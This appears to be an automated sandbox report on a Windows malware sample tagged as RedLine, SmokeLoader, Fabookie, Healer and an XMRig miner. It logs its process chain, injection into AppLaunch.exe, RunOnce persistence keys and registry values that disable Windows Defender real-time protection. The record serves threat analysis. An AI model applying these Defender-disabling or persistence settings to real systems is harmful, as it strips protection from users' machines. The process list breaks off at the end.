Malware Analysis Report

2025-08-06 03:37

Sample ID 230923-yn248aca24
Target 1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855
SHA256 1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855
Tags
fabookie healer redline smokeloader xmrig nanya backdoor dropper evasion infostealer miner persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855

Threat Level: Known bad

The file 1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855 was found to be: Known bad.

Malicious Activity Summary

fabookie healer redline smokeloader xmrig nanya backdoor dropper evasion infostealer miner persistence spyware stealer trojan

SmokeLoader

Detect Fabookie payload

RedLine payload

xmrig

Fabookie

Healer

Detects Healer an antivirus disabler dropper

RedLine

Modifies Windows Defender Real-time Protection settings

XMRig Miner payload

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Uses the VBS compiler for execution

Adds Run key to start application

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Runs net.exe

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-23 19:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-23 19:56

Reported

2023-09-23 19:59

Platform

win10v2004-20230915-en

Max time kernel

95s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7353.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\77B9.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2320 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe
PID 3064 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe
PID 1340 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe
PID 4060 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe
PID 1232 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4060 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe
PID 716 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1340 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe
PID 2020 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3064 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe
PID 4120 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4120 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2320 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e1493527.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe

"C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1232 -ip 1232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 556

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 716 -ip 716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1260 -ip 1260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 204

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2020 -ip 2020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 552

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4120 -ip 4120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 200

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e1493527.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e1493527.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6529.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdc73846f8,0x7ffdc7384708,0x7ffdc7384718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc73846f8,0x7ffdc7384708,0x7ffdc7384718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,14272056013615953310,15064814789335462676,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,14272056013615953310,15064814789335462676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\7353.exe

C:\Users\Admin\AppData\Local\Temp\7353.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\77B9.exe

C:\Users\Admin\AppData\Local\Temp\77B9.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\8343.exe

C:\Users\Admin\AppData\Local\Temp\8343.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\ss41.exe

"C:\Users\Admin\AppData\Local\Temp\ss41.exe"

C:\Users\Admin\AppData\Local\Temp\kos1.exe

"C:\Users\Admin\AppData\Local\Temp\kos1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\AppData\Local\Temp\8F59.exe

C:\Users\Admin\AppData\Local\Temp\8F59.exe

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\kos.exe

"C:\Users\Admin\AppData\Local\Temp\kos.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\is-J8J2G.tmp\is-VCMSS.tmp

"C:\Users\Admin\AppData\Local\Temp\is-J8J2G.tmp\is-VCMSS.tmp" /SL4 $601DC "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1232936 52224

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,4770800977602194263,5587220538587512367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1

C:\Program Files (x86)\PA Previewer\previewer.exe

"C:\Program Files (x86)\PA Previewer\previewer.exe" -i

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 8

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 8

C:\Program Files (x86)\PA Previewer\previewer.exe

"C:\Program Files (x86)\PA Previewer\previewer.exe" -s

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=8F59.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc73846f8,0x7ffdc7384708,0x7ffdc7384718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=8F59.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc73846f8,0x7ffdc7384708,0x7ffdc7384718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,6997176924742542117,14958213130455465269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3152 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

